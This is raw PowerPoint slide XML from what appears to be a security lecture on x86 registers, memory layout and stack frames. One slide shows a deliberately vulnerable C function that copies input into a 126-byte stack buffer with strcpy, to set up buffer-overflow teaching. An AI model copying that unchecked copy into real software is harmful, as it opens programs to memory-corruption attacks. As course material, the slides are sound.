            <a:ext cx="4196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Disassembled machine code for main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6A1F08-EADA-6A4A-A475-72233C0E5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11" y="2125366"/>
            <a:ext cx="2926389" cy="27184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20326D-46B9-134B-BCBB-39667E643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350" y="2014194"/>
            <a:ext cx="4425178" cy="3853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9268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941E9-16F7-A342-A9EB-E544AECF4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Machine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10CC74-60FC-204B-9DFD-547EC11F179D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1230422" y="2266951"/>
            <a:ext cx="50458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Program state includes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800" dirty="0"/>
              <a:t>CPU registers (32-bit on x86)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800" dirty="0"/>
              <a:t>Memory (heap and stack)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Execute instructions one by one, using and modifying state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AECE41-2760-264A-82A7-630B3B101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412" y="2350370"/>
            <a:ext cx="5045868" cy="22787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5468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52800" y="5236066"/>
            <a:ext cx="5657850" cy="421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52800" y="4814858"/>
            <a:ext cx="5657850" cy="421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52800" y="4393650"/>
            <a:ext cx="5657850" cy="421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52801" y="3972442"/>
            <a:ext cx="5660265" cy="421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352801" y="3551233"/>
            <a:ext cx="2814437" cy="421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52801" y="3130025"/>
            <a:ext cx="2814437" cy="421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352801" y="2708817"/>
            <a:ext cx="2814437" cy="421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352801" y="2287609"/>
            <a:ext cx="2814437" cy="421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167237" y="3551233"/>
            <a:ext cx="2814437" cy="421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67237" y="3130025"/>
            <a:ext cx="2814437" cy="421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67237" y="2708817"/>
            <a:ext cx="2814437" cy="421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167237" y="2287609"/>
            <a:ext cx="2814437" cy="421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603433" y="3550658"/>
            <a:ext cx="1407218" cy="421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603433" y="3129450"/>
            <a:ext cx="1407218" cy="421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603433" y="2708242"/>
            <a:ext cx="1407218" cy="421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603433" y="2287033"/>
            <a:ext cx="1407218" cy="4217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823156" y="4044835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ESI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65467" y="4466042"/>
            <a:ext cx="87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EDI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65467" y="4887252"/>
            <a:ext cx="87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ESP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80761" y="5308460"/>
            <a:ext cx="87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EBP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47252" y="3623627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652887" y="3202419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52887" y="2781210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652887" y="2360002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80761" y="3623052"/>
            <a:ext cx="87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EDX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80761" y="3201843"/>
            <a:ext cx="87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ECX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480761" y="2781210"/>
            <a:ext cx="87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EBX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80761" y="2360002"/>
            <a:ext cx="87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EAX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49866" y="2359427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049866" y="2781210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049866" y="3202419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049866" y="3623052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63476" y="2359427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AH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663476" y="2781210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BH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663476" y="3202419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663476" y="3623052"/>
            <a:ext cx="51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DH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535568" y="4876801"/>
            <a:ext cx="175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(stack pointer)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562600" y="5267981"/>
            <a:ext cx="165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(base pointer)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3352801" y="1649069"/>
            <a:ext cx="5660265" cy="523220"/>
            <a:chOff x="914400" y="1238519"/>
            <a:chExt cx="7547020" cy="697627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914400" y="1676400"/>
              <a:ext cx="7547020" cy="0"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:ln>
              <a:headEnd type="triangle" w="lg" len="lg"/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4150037" y="1238519"/>
              <a:ext cx="838200" cy="6976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32 bits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1CB0C99-80F4-BB4B-8EF7-0756737B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 Registers </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2831406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941E9-16F7-A342-A9EB-E544AECF4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Machine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10CC74-60FC-204B-9DFD-547EC11F179D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1230422" y="2266951"/>
            <a:ext cx="50458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Program state includes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800" dirty="0"/>
              <a:t>CPU registers (32-bit on x86)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800" dirty="0"/>
              <a:t>Memory (heap and stack)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Execute instructions one by one, using and modifying state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AECE41-2760-264A-82A7-630B3B101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412" y="2350370"/>
            <a:ext cx="5045868" cy="22787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612CEB-9DF1-F044-A81C-25864632ECC4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1230422" y="5197364"/>
            <a:ext cx="4277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Example:     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0"/>
              <a:t>add $0x4,%eax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CCC8F-C11B-CC4B-97BE-2F44DDB63783}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1230422" y="5607278"/>
            <a:ext cx="2608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Example:     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0" err="1"/>
              <a:t>nop</a:t>
            </a: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D4821-EB78-4945-B682-43A04D566C09}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5848350" y="5254514"/>
            <a:ext cx="50458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This adds 4 to the value in the EAX register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349C4-0EFD-C64D-A571-8A4266C35972}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5867400" y="566442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Single-byte (0x90) “no op” instruction, does nothing! </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="5472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0" y="2318933"/>
            <a:ext cx="800100" cy="6286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.text</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3086100" y="2318933"/>
            <a:ext cx="800100" cy="6286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.data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3886200" y="2318933"/>
            <a:ext cx="857250" cy="6286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.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>bss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4743450" y="2318933"/>
            <a:ext cx="2057400" cy="6286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" name="Document 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="4968776" y="2087058"/>
            <a:ext cx="635200" cy="1085850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972052" y="2445413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heap</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Document 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="6483251" y="2093608"/>
            <a:ext cx="635200" cy="1085850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654270" y="2445413"/>
            <a:ext cx="715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stack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324349" y="2325483"/>
            <a:ext cx="800100" cy="6286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Env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3901" y="4191001"/>
            <a:ext cx="53609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.text:	machine code of executable</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>.data:	global initialized variables</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>bss</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>:	“below stack section”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>    	global uninitialized variables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107169" y="4191001"/>
            <a:ext cx="53609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heap:	dynamic variables</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>stack:	local variables, track </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>func</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> calls</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Env:	environment variables, 	arguments to program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86401" y="1804584"/>
            <a:ext cx="165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unused space</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="20" name="Straight Arrow Connector 19"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="18" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="6057903" y="2204694"/>
            <a:ext cx="256610" cy="27914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328306" y="3176183"/>
            <a:ext cx="530489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384662" y="3176183"/>
            <a:ext cx="530489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097138" y="2988168"/>
            <a:ext cx="16562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Low memory </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>addresses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72351" y="3061883"/>
            <a:ext cx="1659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High memory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>addresses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0C6F1-0396-FA47-915E-A3C34A80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Memory Layout</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1716105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3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F0C8D3F8-9979-5744-8118-E7E881E533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Stack Buffers</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10245" name="Rectangle 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5E28F5E2-6A02-1F4F-9A30-C5408D5990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6610350" cy="3849624"/>
          </a:xfrm>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>Suppose a Web server contains this function</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Monotype Sorts" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>		void </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0" err="1">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>func</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>(char *str) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Monotype Sorts" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>           char </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0" err="1">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>buf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>[126];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Monotype Sorts" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>           </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0" err="1">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>strcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0" err="1">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>buf,str</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Monotype Sorts" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>     	}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>When this function is invoked, a new </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>frame</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t> (activation record) is pushed onto the stack</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2400" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10246" name="AutoShape 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C7B34133-C60E-FE45-9206-1EE0946B7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495" y="2838069"/>
            <a:ext cx="2954655" cy="590931"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -77079"/>
              <a:gd name="adj2" fmla="val 39551"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700" algn="ctr">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"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Allocate local buffer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(126 bytes reserved on stack)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10247" name="AutoShape 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{758B8C82-EED0-5A41-BC45-6291C0BB4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433" y="3688047"/>
            <a:ext cx="3272050" cy="341632"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -69292"/>
              <a:gd name="adj2" fmla="val -15241"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700" algn="ctr">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"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Copy argument into local buffer</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1037559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AutoShape 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D9F7B3E6-30B6-0640-8889-7AA58B305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1947" y="4918492"/>
            <a:ext cx="3144045" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -23248"/>
              <a:gd name="adj2" fmla="val -18855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Execute code at this address after </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>func</a:t>
            </a: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() finishes</a:t>
            </a:r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F0C8D3F8-9979-5744-8118-E7E881E533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Frame Layout</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10248" name="Line 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E3873D95-ED8F-EA48-8265-B760E6BE31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4682" y="3090863"/>
            <a:ext cx="6705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9" name="Line 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{50192C96-BB55-874E-808D-026C96FF65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4682" y="3776663"/>
            <a:ext cx="6705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0" name="AutoShape 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9563ACAB-C44E-1C4D-B8D7-CFB5A2373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082" y="3124201"/>
            <a:ext cx="819968" cy="590931"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -69546"/>
              <a:gd name="adj2" fmla="val -1518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Top of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stack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10251" name="Line 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AC899124-76CE-984E-8A1C-7AB35F9A60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04282" y="2938463"/>
            <a:ext cx="3352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2" name="Rectangle 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6BE2A7B8-ADA5-2E4E-A5D3-9F280982F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9482" y="2735264"/>
            <a:ext cx="1944763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Stack grows this way</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10253" name="Rectangle 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{64FBC6E6-05CB-D447-89A3-E2C3D8AA7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032" y="3090863"/>
            <a:ext cx="2286000" cy="685800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFCCCC"/>
          </a:solidFill>
          <a:ln w="28575" algn="ctr">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd type="none" w="lg" len="lg"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buf</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10254" name="Rectangle 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{51B8A67C-5E51-9E4B-8872-EF2B12A92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908" y="3090863"/>
            <a:ext cx="746125" cy="6858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miter lim="800000"/>
            <a:headEnd type="none" w="lg" len="lg"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sfp</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10255" name="Rectangle 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FC7ADBF4-A66D-0740-AAC6-42970FA84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8908" y="3090863"/>
            <a:ext cx="746125" cy="6858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miter lim="800000"/>
            <a:headEnd type="none" w="lg" len="lg"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ret</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>addr</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" alt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56" name="Rectangle 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C291C54B-71AA-A34B-8D37-7A666067A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0908" y="3090863"/>
            <a:ext cx="746125" cy="685800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="folHlink"/>
          </a:solidFill>
          <a:ln w="28575" algn="ctr">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd type="none" w="lg" len="lg"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110000"/>
              </a:lnSpc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str</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10257" name="AutoShape 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7C0FBAD5-D2F3-1A41-AD0C-303DF6F2AC45}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="5400000">
            <a:off x="3421832" y="2895600"/>
            <a:ext cx="152400" cy="2133600"/>
          </a:xfrm>
          <a:prstGeom prst="rightBrace">
            <a:avLst>
              <a:gd name="adj1" fmla="val 116667"/>
              <a:gd name="adj2" fmla="val 49995"/>
            </a:avLst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10258" name="AutoShape 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{464F05DE-5475-CA44-8C39-11B286192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032" y="4074080"/>
            <a:ext cx="1744388" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -69292"/>
              <a:gd name="adj2" fmla="val -1524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Local variables</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10259" name="AutoShape 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{235CED42-BA80-454A-B7BC-A728FBA7D2FF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="5400000">
            <a:off x="4945832" y="3581400"/>
            <a:ext cx="152400" cy="762000"/>
          </a:xfrm>
          <a:prstGeom prst="rightBrace">
            <a:avLst>
              <a:gd name="adj1" fmla="val 41667"/>
              <a:gd name="adj2" fmla="val 49995"/>
            </a:avLst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10260" name="Rectangle 19" descr="20%">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FB459B98-A683-DE46-A3DC-2A6EE344F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7682" y="3200400"/>
            <a:ext cx="1295400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i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Frame of the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i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>calling function</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10261" name="AutoShape 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B98D8C0D-F8E2-5142-8F16-1ED9E697B58B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="5400000">
            <a:off x="5707832" y="3657600"/>
            <a:ext cx="152400" cy="609600"/>
          </a:xfrm>
          <a:prstGeom prst="rightBrace">
            <a:avLst>
              <a:gd name="adj1" fmla="val 33333"/>
              <a:gd name="adj2" fmla="val 49995"/>
            </a:avLst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10263" name="AutoShape 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5250C7AD-3CE9-BE4C-9B0C-006ABB92E21F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="5400000">
            <a:off x="6507932" y="3543300"/>
            <a:ext cx="152400" cy="838200"/>
          </a:xfrm>
          <a:prstGeom prst="rightBrace">
            <a:avLst>
              <a:gd name="adj1" fmla="val 45833"/>
              <a:gd name="adj2" fmla="val 49995"/>
            </a:avLst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10264" name="Rectangle 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0DFC0C7F-B385-8049-A283-44C99D439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8832" y="4050267"/>
            <a:ext cx="13676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Arguments</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10265" name="AutoShape 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{21B0351B-207B-BF4E-89B9-38204D6AB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883" y="4042190"/>
            <a:ext cx="2133599" cy="707886"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -69250"/>
              <a:gd name="adj2" fmla="val -1548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Pointer to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previous frame</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10243" name="Freeform 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{115E401D-6259-F84E-A58E-472442615F7C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5881689" y="3820775"/>
            <a:ext cx="2324895" cy="875942"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 2025"/>
              <a:gd name="T1" fmla="*/ 2147483647 h 644"/>
              <a:gd name="T2" fmla="*/ 2147483647 w 2025"/>
